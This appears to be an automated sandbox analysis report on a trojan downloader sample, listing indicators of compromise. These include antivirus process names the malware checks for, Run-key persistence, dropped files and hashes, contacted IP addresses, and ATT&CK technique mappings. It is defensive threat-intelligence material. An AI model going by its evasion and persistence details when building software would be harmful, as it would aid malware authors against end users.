Source: C:\Users\user\AppData\Roaming\._cache_zhuzhu.exe Code function: 4_2_03776A70 wsprintfW,GetCurrentProcessId,wsprintfW,_memset,GetVersionExW,GetCurrentProcess,OpenProcessToken,GetTokenInformation,GetLastError,LocalAlloc,GetTokenInformation,GetSidSubAuthorityCount,GetSidSubAuthority,LocalFree,CloseHandle,wsprintfW,4_2_03776A70
Source: ._cache_zhuzhu.exe Binary or memory string: vsserv.exe
Source: ._cache_zhuzhu.exe Binary or memory string: avcenter.exe
Source: ._cache_zhuzhu.exe Binary or memory string: cfp.exe
Source: inst.exe Binary or memory string: SuperKiller.exe
Source: Amcache.hve.22.dr Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
Source: Amcache.hve.22.dr Binary or memory string: msmpeng.exe
Source: Amcache.hve.22.dr Binary or memory string: c:\program files\windows defender\msmpeng.exe
Source: ._cache_zhuzhu.exe Binary or memory string: rtvscan.exe
Source: ._cache_zhuzhu.exe Binary or memory string: TMBMSRV.exe
Source: inst.exe Binary or memory string: SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\360Safe.exe
Source: inst.exe Binary or memory string: \SuperKiller.exe
Source: ._cache_zhuzhu.exe Binary or memory string: avgwdsvc.exe
Source: inst.exe Binary or memory string: SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\360safe.exe
Source: inst.exe Binary or memory string: firstaid\superkiller.exe
Source: inst.exe Binary or memory string: Software\Microsoft\Windows\CurrentVersion\App Paths\360safe.exe
Source: Amcache.hve.22.dr Binary or memory string: MsMpEng.exe
Source: ._cache_zhuzhu.exe Binary or memory string: K7TSecurity.exe
Source: ._cache_zhuzhu.exe Binary or memory string: acs.exe
Source: ._cache_zhuzhu.exe Binary or memory string: kxetray.exe
Source: ._cache_zhuzhu.exe Binary or memory string: KSafeTray.exe
Source: ._cache_zhuzhu.exe Binary or memory string: avp.exe
Source: inst.exe Binary or memory string: 360safe.exe
Source: ._cache_zhuzhu.exe Binary or memory string: 360Safe.exe
Source: inst.exe Binary or memory string: 360tray.exe
Source: ._cache_zhuzhu.exe Binary or memory string: ashDisp.exe
Source: ._cache_zhuzhu.exe Binary or memory string: 360Tray.exe
Source: ._cache_zhuzhu.exe Binary or memory string: AYAgent.aye
Source: ._cache_zhuzhu.exe Binary or memory string: RavMonD.exe
Source: ._cache_zhuzhu.exe Binary or memory string: QUHLPSVC.EXE
Source: ._cache_zhuzhu.exe Binary or memory string: Mcshield.exe
Source: C:\Windows\System32\conhost.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter2 : AntiVirusProduct

                                      Stealing of Sensitive Information

Source: Yara match File source: Process Memory Space: ._cache_zhuzhu.exe PID: 6340, type: MEMORYSTR
Source: Yara match File source: zhuzhu.exe, type: SAMPLE
Source: Yara match File source: 0.0.zhuzhu.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000002.00000003.1744249799.00000000005FF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000000.1657184118.0000000000401000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: zhuzhu.exe PID: 6652, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: Synaptics.exe PID: 5780, type: MEMORYSTR
Source: Yara match File source: C:\Users\user\Documents\DTBZGIOOSO\~$cache1, type: DROPPED
Source: Yara match File source: C:\ProgramData\Synaptics\RCXE77E.tmp, type: DROPPED
Source: Yara match File source: C:\ProgramData\Synaptics\Synaptics.exe, type: DROPPED
Source: C:\Users\user\Downloads\inst.exe Device IO: \Device\Harddisk0\DR0

                                      Remote Access Functionality

Source: Yara match File source: Process Memory Space: ._cache_zhuzhu.exe PID: 6340, type: MEMORYSTR
Source: Yara match File source: zhuzhu.exe, type: SAMPLE
Source: Yara match File source: 0.0.zhuzhu.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000002.00000003.1744249799.00000000005FF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000000.1657184118.0000000000401000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: zhuzhu.exe PID: 6652, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: Synaptics.exe PID: 5780, type: MEMORYSTR
Source: Yara match File source: C:\Users\user\Documents\DTBZGIOOSO\~$cache1, type: DROPPED
Source: Yara match File source: C:\ProgramData\Synaptics\RCXE77E.tmp, type: DROPPED
Source: Yara match File source: C:\ProgramData\Synaptics\Synaptics.exe, type: DROPPED
Source: C:\Users\user\Desktop\._cache_zhuzhu.exe Code function: 1_2_1000EE80 RpcStringBindingComposeW,RpcBindingFromStringBindingW,RpcBindingSetAuthInfoExA,RpcStringFreeW,1_2_1000EE80
Source: C:\Users\user\Desktop\._cache_zhuzhu.exe Code function: 1_2_0286EE57 RpcStringBindingComposeW,RpcBindingFromStringBindingW,RpcBindingSetAuthInfoExA,RpcStringFreeW,1_2_0286EE57
Source: C:\Users\user\Downloads\inst.exe Code function: 7_2_5F51FEA4 listen,7_2_5F51FEA4
Source: C:\Users\user\Downloads\inst.exe Code function: 7_2_5F51FB95 htonl,bind,7_2_5F51FB95
Source: C:\Users\user\Downloads\inst.exe Code function: 7_2_5F5221AC socket,_memset,htonl,htonl,htons,htonl,bind,7_2_5F5221AC
| Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact |
| Gather Victim Identity Information | 41 Scripting | 2 Replication Through Removable Media | 21 Windows Management Instrumentation | 41 Scripting | 1 DLL Side-Loading | 1 Disable or Modify Tools | 121 Input Capture | 2 System Time Discovery | Remote Services | 1 Archive Collected Data | 4 Ingress Tool Transfer | Exfiltration Over Other Network Medium | 1 System Shutdown/Reboot |
| Credentials | Domains | Default Accounts | 2 Native API | 1 DLL Side-Loading | 1 Extra Window Memory Injection | 1 Deobfuscate/Decode Files or Information | LSASS Memory | 11 Peripheral Device Discovery | Remote Desktop Protocol | 1 Screen Capture | 11 Encrypted Channel | Exfiltration Over Bluetooth | Network Denial of Service |
| Email Addresses | DNS Server | Domain Accounts | 2 Command and Scripting Interpreter | 1 Registry Run Keys / Startup Folder | 1 Access Token Manipulation | 2 Obfuscated Files or Information | Security Account Manager | 1 Account Discovery | SMB/Windows Admin Shares | 121 Input Capture | 1 Non-Standard Port | Automated Exfiltration | Data Encrypted for Impact |
| Employee Names | Virtual Private Server | Local Accounts | 1 PowerShell | 1 Bootkit | 223 Process Injection | 1 Software Packing | NTDS | 5 File and Directory Discovery | Distributed Component Object Model | 2 Clipboard Data | 3 Non-Application Layer Protocol | Traffic Duplication | Data Destruction |
| Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | 1 Registry Run Keys / Startup Folder | 1 DLL Side-Loading | LSA Secrets | 257 System Information Discovery | SSH | Keylogging | 314 Application Layer Protocol | Scheduled Transfer | Data Encrypted for Impact |
| Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 1 Extra Window Memory Injection | Cached Domain Credentials | 1 Query Registry | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop |
| DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 12 Masquerading | DCSync | 471 Security Software Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery |
| Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 1 Modify Registry | Proc Filesystem | 151 Virtualization/Sandbox Evasion | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement |
| Network Topology | Malvertising | Exploit Public-Facing Application | Command and Scripting Interpreter | At | At | 151 Virtualization/Sandbox Evasion | /etc/passwd and /etc/shadow | 13 Process Discovery | Direct Cloud VM Connections | Data Staged | Web Protocols | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Internal Defacement |
| IP Addresses | Compromise Infrastructure | Supply Chain Compromise | PowerShell | Cron | Cron | 1 Access Token Manipulation | Network Sniffing | 11 Application Window Discovery | Shared Webroot | Local Data Staging | File Transfer Protocols | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol | External Defacement |
| Network Security Appliances | Domains | Compromise Software Dependencies and Development Tools | AppleScript | Launchd | Launchd | 223 Process Injection | Input Capture | 1 System Owner/User Discovery | Software Deployment Tools | Remote Data Staging | Mail Protocols | Exfiltration Over Unencrypted Non-C2 Protocol | Firmware Corruption |
| Gather Victim Org Information | DNS Server | Compromise Software Supply Chain | Windows Command Shell | Scheduled Task | Scheduled Task | 1 Bootkit | Keylogging | 1 System Network Configuration Discovery | Taint Shared Content | Screen Capture | DNS | Exfiltration Over Physical Medium | Resource Hijacking |
| Determine Physical Locations | Virtual Private Server | Compromise Hardware Supply Chain | Unix Shell | Systemd Timers | Systemd Timers | 1 Indicator Removal | GUI Input Capture | Permission Groups Discovery | Replication Through Removable Media | Email Collection | Proxy | Exfiltration over USB | Network Denial of Service |
[Behavior graph. ID: 1582239, Sample: zhuzhu.exe, Startdate: 30/12/2024, Architecture: WINDOWS, Score: 100]

| Source | Detection | Scanner | Label | Link |
| zhuzhu.exe | 83% | Virustotal | | Browse |
| zhuzhu.exe | 92% | ReversingLabs | Win32.Trojan.Synaptics | |
| zhuzhu.exe | 100% | Avira | TR/Dldr.Agent.SH | |
| zhuzhu.exe | 100% | Avira | W2000M/Dldr.Agent.17651006 | |
| zhuzhu.exe | 100% | Joe Sandbox ML | | |
| Source | Detection | Scanner | Label | Link |
| C:\Users\user\Documents\DTBZGIOOSO\~$cache1 | 100% | Avira | TR/Dldr.Agent.SH | |
| C:\Users\user\Documents\DTBZGIOOSO\~$cache1 | 100% | Avira | W2000M/Dldr.Agent.17651006 | |
| C:\ProgramData\Synaptics\Synaptics.exe | 100% | Avira | TR/Dldr.Agent.SH | |
| C:\ProgramData\Synaptics\Synaptics.exe | 100% | Avira | W2000M/Dldr.Agent.17651006 | |
| C:\ProgramData\Synaptics\RCXE77E.tmp | 100% | Avira | TR/Dldr.Agent.SH | |
| C:\ProgramData\Synaptics\RCXE77E.tmp | 100% | Avira | W2000M/Dldr.Agent.17651006 | |
| C:\Users\user\Documents\DTBZGIOOSO\~$cache1 | 100% | Joe Sandbox ML | | |
| C:\ProgramData\Synaptics\Synaptics.exe | 100% | Joe Sandbox ML | | |
| C:\ProgramData\Synaptics\RCXE77E.tmp | 100% | Joe Sandbox ML | | |
| C:\ProgramData\Synaptics\Synaptics.exe | 92% | ReversingLabs | Win32.Trojan.Synaptics | |
| C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\inst[1].exe | 17% | ReversingLabs | | |
| C:\Users\user\AppData\Local\Temp\{92EE34F9-CBF9-4899-A446-C0FD9C9E29A7}.tmp\360P2SP.dll | 4% | ReversingLabs | | |
| C:\Users\user\AppData\Local\Temp\{A44B7723-4283-41b8-B9C0-6B1983C61382}.tmp\sites.dll | 0% | ReversingLabs | | |
| C:\Users\user\AppData\Roaming\._cache_zhuzhu.exe | 0% | ReversingLabs | | |
| C:\Users\user\Desktop\._cache_zhuzhu.exe | 0% | ReversingLabs | | |
| C:\Users\user\Downloads\inst.exe | 17% | ReversingLabs | | |
                                      No Antivirus matches
                                      No Antivirus matches
Source | Detection | Scanner | Label | Link
Name | IP | Active | Malicious | Antivirus Detection | Reputation
Name | Malicious | Antivirus Detection | Reputation
Name | Source | Malicious | Antivirus Detection | Reputation
IP | Domain | Country | Flag | ASN | ASN Name | Malicious
                                                                                                                                        142.250.181.238
                                                                                                                                        docs.google.comUnited States
                                                                                                                                        15169GOOGLEUSfalse
                                                                                                                                        142.250.186.129
                                                                                                                                        drive.usercontent.google.comUnited States
                                                                                                                                        15169GOOGLEUSfalse
                                                                                                                                        1.192.136.170
                                                                                                                                        st.p.360.cnChina
                                                                                                                                        137687CHINATELECOM-HENAN-LUOYANG-IDCLuoyangHenanProvincePRfalse
                                                                                                                                        118.107.44.219
                                                                                                                                        unknownSingapore
                                                                                                                                        64050BCPL-SGBGPNETGlobalASNSGtrue
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1582239
Start date and time: 2024-12-30 04:58:07 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 13m 4s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed: 28
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
                                                                                                                                        Technologies:
                                                                                                                                        • HCA enabled
                                                                                                                                        • EGA enabled
                                                                                                                                        • AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: zhuzhu.exe
Detection: MAL
Classification: mal100.bank.troj.spyw.expl.evad.winEXE@26/101@20/14
                                                                                                                                        EGA Information:
                                                                                                                                        • Successful, ratio: 80%
                                                                                                                                        HCA Information:
                                                                                                                                        • Successful, ratio: 73%
                                                                                                                                        • Number of executed functions: 332
                                                                                                                                        • Number of non-executed functions: 185
                                                                                                                                        Cookbook Comments:
                                                                                                                                        • Found application associated with file extension: .exe
                                                                                                                                        • Override analysis time to 240000 for current running targets taking high CPU consumption
                                                                                                                                        • Behavior information exceeds normal sizes, reducing to normal. Report will have missing behavior information.
                                                                                                                                        • Exclude process from analysis (whitelisted): MpCmdRun.exe, sppsvc.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
                                                                                                                                        • Excluded IPs from analysis (whitelisted): 52.109.32.97, 52.113.194.132, 184.28.90.27, 40.79.189.58, 52.182.143.212, 20.189.173.20, 40.126.32.68, 52.149.20.212, 13.107.246.45
                                                                                                                                        • Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, otelrules.afd.azureedge.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, ecs-office.s-0005.s-msedge.net, ocsp.digicert.com, onedsblobprdcus15.centralus.cloudapp.azure.com, login.live.com, e16604.g.akamaiedge.net, officeclient.microsoft.com, ukw-azsc-config.officeapps.live.com, prod.fs.microsoft.com.akadns.net, ecs.office.com, self-events-data.trafficmanager.net, fs.microsoft.com, otelrules.azureedge.net, prod.configsvc1.live.com.akadns.net, self.events.data.microsoft.com, onedsblobprdwus15.westus.cloudapp.azure.com, ctldl.windowsupdate.com, s-0005-office.config.skype.com, fe3cr.delivery.mp.microsoft.com, s-0005.s-msedge.net, config.officeapps.live.com, blobcollector.events.data.trafficmanager.net, azureedge-t-prod.trafficmanager.net, umwatson.events.data.microsoft.com, ecs.office.trafficmanager.net, onedscolprdjpe02.japaneast.cloudapp.azure.com, europe.configsvc1.live.com.akadns.n
                                                                                                                                        • Execution Graph export aborted for target Synaptics.exe, PID 5780 because there are no executed function
                                                                                                                                        • HTTPS sessions have been limited to 150. Please view the PCAPs for the complete data.
                                                                                                                                        • Not all processes where analyzed, report is missing behavior information
                                                                                                                                        • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                                                                                        • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                                        • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                                                                        • Report size getting too big, too many NtCreateKey calls found.
                                                                                                                                        • Report size getting too big, too many NtDeviceIoControlFile calls found.
                                                                                                                                        • Report size getting too big, too many NtEnumerateKey calls found.
                                                                                                                                        • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                        • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                                        • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                        • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                                                                                                        • Report size getting too big, too many NtSetInformationFile calls found.
                                                                                                                                        • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Time      Type             Description
03:59:03  Autostart        Run: HKLM\Software\Microsoft\Windows\CurrentVersion\Run Synaptics Pointing Device Driver C:\ProgramData\Synaptics\Synaptics.exe
03:59:08  Task Scheduler   Run new task: .Net OneStart path: C:\Users\user\Downloads\inst.exe
22:59:06  API Interceptor  459x Sleep call for process: Synaptics.exe modified
22:59:08  API Interceptor  2562297x Sleep call for process: ._cache_zhuzhu.exe modified
22:59:09  API Interceptor  8x Sleep call for process: powershell.exe modified
22:59:46  API Interceptor  4237170x Sleep call for process: inst.exe modified
23:00:05  API Interceptor  2x Sleep call for process: WerFault.exe modified
23:01:03  API Interceptor  1360206x Sleep call for process: splwow64.exe modified
                                                                                                                                                          db0fa4b8db0333367e9bda3ab68b8042.sh4.elfGet hashmaliciousMirai, GafgytBrowse
                                                                                                                                                          • 117.135.228.168
                                                                                                                                                          db0fa4b8db0333367e9bda3ab68b8042.x86.elfGet hashmaliciousGafgyt, MiraiBrowse
                                                                                                                                                          • 36.169.144.160
                                                                                                                                                          CMNET-GDGuangdongMobileCommunicationCoLtdCNloligang.spc.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                          • 218.201.238.247
                                                                                                                                                          loligang.arm7.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                          • 120.206.216.207
                                                                                                                                                          arm.elfGet hashmaliciousMirai, MoobotBrowse
                                                                                                                                                          • 117.156.66.127
                                                                                                                                                          x86.elfGet hashmaliciousMirai, MoobotBrowse
                                                                                                                                                          • 111.10.231.158
                                                                                                                                                          QQyisSetups64.exeGet hashmaliciousGhostRatBrowse
                                                                                                                                                          • 39.156.85.231
                                                                                                                                                          wyySetups64.exeGet hashmaliciousGhostRatBrowse
                                                                                                                                                          • 39.156.85.231
                                                                                                                                                          db0fa4b8db0333367e9bda3ab68b8042.m68k.elfGet hashmaliciousMirai, GafgytBrowse
                                                                                                                                                          • 117.150.97.30
                                                                                                                                                          db0fa4b8db0333367e9bda3ab68b8042.sh4.elfGet hashmaliciousMirai, GafgytBrowse
                                                                                                                                                          • 117.151.161.150
                                                                                                                                                          db0fa4b8db0333367e9bda3ab68b8042.sh4.elfGet hashmaliciousMirai, GafgytBrowse
                                                                                                                                                          • 117.135.228.168
                                                                                                                                                          db0fa4b8db0333367e9bda3ab68b8042.x86.elfGet hashmaliciousGafgyt, MiraiBrowse
                                                                                                                                                          • 36.169.144.160
                                                                                                                                                          CHINATELECOM-HENAN-LUOYANG-IDCLuoyangHenanProvincePRQQyisSetups64.exeGet hashmaliciousGhostRatBrowse
                                                                                                                                                          • 1.192.136.170
                                                                                                                                                          wyySetups64.exeGet hashmaliciousGhostRatBrowse
                                                                                                                                                          • 1.192.136.170
                                                                                                                                                          mips.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                          • 1.192.222.114
                                                                                                                                                          mips.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                                                                                          • 1.192.240.164
                                                                                                                                                          Josho.ppc.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                          • 1.192.222.117
                                                                                                                                                          meerkat.mpsl.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                          • 1.192.193.56
                                                                                                                                                          mpsl.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                          • 36.99.183.94
                                                                                                                                                          x86_64.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                                                                                          • 1.192.193.76
                                                                                                                                                          la.bot.mipsel.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                          • 1.192.240.133
                                                                                                                                                          m68k.elfGet hashmaliciousMirai, MoobotBrowse
                                                                                                                                                          • 36.99.33.202
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\inst[1].exe | QQyisSetups64.exe | Get hash | malicious | GhostRat | Browse |
 | wyySetups64.exe | Get hash | malicious | GhostRat | Browse |
C:\Users\user\AppData\Local\Temp\{92EE34F9-CBF9-4899-A446-C0FD9C9E29A7}.tmp\360P2SP.dll | QQyisSetups64.exe | Get hash | malicious | GhostRat | Browse |
 | wyySetups64.exe | Get hash | malicious | GhostRat | Browse |
 | A1FsbRkm5m.exe | Get hash | malicious | Unknown | Browse |
                                                                                                                                                                    Process:C:\Users\user\Downloads\inst.exe
                                                                                                                                                                    File Type:data
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):38
                                                                                                                                                                    Entropy (8bit):2.663180203976347
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:3:Sclj4I9R:vlEI9R
                                                                                                                                                                    MD5:68EDAF4FBCFFFB168E50C1695BA620E1
                                                                                                                                                                    SHA1:7D42060D5E0153562EE4E1564D505E4438BE23A9
                                                                                                                                                                    SHA-256:2DAE268E38E73A7E317C296B1FFD3941AF87DD7822968CFA0FCF8C1426DB7534
                                                                                                                                                                    SHA-512:2E204EFF691837D3472C4EEC9EE886C8A9CD5A482893EFC95AE23FA622657EA4E04777A9D99A10074A9C003CEA15CB5D69EC09418015A5A49228BBFB741D8D5F
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Preview:{.F.D.2.C.3.9.F.B.-.F.4.D.3.-.4.b.9.4.
                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                                                                                                                                                    File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):118
                                                                                                                                                                    Entropy (8bit):3.5700810731231707
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:3:QaklTlAlXMLLmHlIlFLlmIK/5lTn84vlJlhlXlDHlA6l3l6Als:QFulcLk04/5p8GVz6QRq
                                                                                                                                                                    MD5:573220372DA4ED487441611079B623CD
                                                                                                                                                                    SHA1:8F9D967AC6EF34640F1F0845214FBC6994C0CB80
                                                                                                                                                                    SHA-256:BE84B842025E4241BFE0C9F7B8F86A322E4396D893EF87EA1E29C74F47B6A22D
                                                                                                                                                                    SHA-512:F19FA3583668C3AF92A9CEF7010BD6ECEC7285F9C8665F2E9528DBA606F105D9AF9B1DB0CF6E7F77EF2E395943DC0D5CB37149E773319078688979E4024F9DD7
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.H.e.a.r.t.b.e.a.t.C.a.c.h.e./.>.
                                                                                                                                                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                    File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):65536
                                                                                                                                                                    Entropy (8bit):1.133645338198185
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:192:GvNWVpszImV0BU/3DzJDzqjYdA/NczxwzuiFUZ24IO8EKDzy:pyzMBU/3Jqj8KzuiFUY4IO8zy
                                                                                                                                                                    MD5:3C8D3FD2F52C16261488F4390DAD7D92
                                                                                                                                                                    SHA1:302A38C5FE3BFEBDF674568AC160447D04DE2502
                                                                                                                                                                    SHA-256:1AA49E52A25F8C4EBF49D1096E20A16EA5FE554B0982D2C59A9D9E855F986539
                                                                                                                                                                    SHA-512:D1A88EF46ED4FC625406C91967C30123D0733BB773EF49B7B60C4D0BA00FE3705FCD3C4326B0BC95CC9CF3E9B369806CAF89FD8C452156EDD5DF6239E512A5D4
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.8.0.0.0.4.7.9.5.1.9.6.7.0.5.6.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.8.0.0.0.4.8.0.2.7.7.4.8.3.1.5.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.d.6.a.5.6.9.a.7.-.6.6.4.2.-.4.5.3.8.-.8.b.4.3.-.9.2.0.d.5.d.a.3.5.a.f.4.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.0.7.1.e.7.e.8.b.-.7.8.3.a.-.4.4.f.d.-.9.2.6.8.-.7.c.4.c.1.0.0.d.c.8.2.d.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.S.y.n.a.p.t.i.c.s...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.6.9.4.-.0.0.0.1.-.0.0.1.4.-.a.f.f.d.-.9.4.2.7.6.f.5.a.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.b.9.9.a.1.3.7.d.5.9.3.d.d.a.9.d.1.5.8.d.c.8.b.6.b.7.7.2.0.d.e.b.0.0.0.0.1.f.0.4.!.0.0.0.0.7.a.3.9.2.2.c.6.d.e.7.b.4.2.4.8.3.e.4.8.6.4.4.c.9.1.7.a.d.a.5.4.6.7.f.d.1.a.4.4.!.S.y.n.a.p.t.i.c.s...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.
                                                                                                                                                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                    File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                    Category:modified
                                                                                                                                                                    Size (bytes):65536
                                                                                                                                                                    Entropy (8bit):1.1332002667214085
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:192:066FWVpsnImy0RbgFqfDzJDzqjYdA/NczxwzuiFUZ24IO8EKDzy:0h4ynTRbQcJqj8KzuiFUY4IO8zy
                                                                                                                                                                    MD5:5A4647F1732A39BC6B030D0A7F1EF670
                                                                                                                                                                    SHA1:23150CD47BE75AEA5A1E92FB20A9B92DACD9317F
                                                                                                                                                                    SHA-256:1F36E48DDD3610556A7A911F5645CF767E13A18E727CED30A762F0804F8C337B
                                                                                                                                                                    SHA-512:967868886706994844A84CCF4E0944D7BBE3AA6FBAB559568725E1389668E3D48347D6F0F7B6D5792B7739C43283016C95B61953FCC422BEEF2C530BF06ED5B5
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.8.0.0.0.4.8.0.6.3.5.1.2.2.3.9.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.8.0.0.0.4.8.1.4.1.3.2.4.7.4.2.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.9.1.a.e.1.1.b.a.-.0.5.5.4.-.4.3.1.f.-.a.f.d.5.-.a.9.8.f.7.0.e.c.6.d.f.a.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.b.1.2.3.0.8.e.5.-.c.6.9.9.-.4.5.e.5.-.8.6.1.3.-.2.6.b.9.b.0.6.e.a.4.5.0.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.S.y.n.a.p.t.i.c.s...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.6.9.4.-.0.0.0.1.-.0.0.1.4.-.a.f.f.d.-.9.4.2.7.6.f.5.a.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.b.9.9.a.1.3.7.d.5.9.3.d.d.a.9.d.1.5.8.d.c.8.b.6.b.7.7.2.0.d.e.b.0.0.0.0.1.f.0.4.!.0.0.0.0.7.a.3.9.2.2.c.6.d.e.7.b.4.2.4.8.3.e.4.8.6.4.4.c.9.1.7.a.d.a.5.4.6.7.f.d.1.a.4.4.!.S.y.n.a.p.t.i.c.s...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.
                                                                                                                                                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                    File Type:Mini DuMP crash report, 15 streams, Mon Dec 30 03:59:57 2024, 0x1205a4 type
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):4005354
                                                                                                                                                                    Entropy (8bit):2.300483170727101
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:6144:Y16Ids+/wdV5yTrU3KMapwD0uWG5/iQ87E0/OwuHeaDoQTTvRWnaLH1tEfWSxHNS:YtC+Q2kispBrjHJQaLHkJxHNl
                                                                                                                                                                    MD5:D1AE3975D52BD8C8934A67E340069148
                                                                                                                                                                    SHA1:F7085C94D55C4ADB675A479DAB9FD383A80930D7
                                                                                                                                                                    SHA-256:9F2A62F5E894D9A376CC9C20C84D7170C2FFD26E945BF847EF5006FF2A65C729
                                                                                                                                                                    SHA-512:3575E3151750950D05D8F1B903888E0A42BCE9169DA0671187953AF7F90C40EFBD61960833CD517B9B82A957F0D0ED05129FB16B26D94A946EEA6FC38060EC65
                                                                                                                                                                    Malicious:false
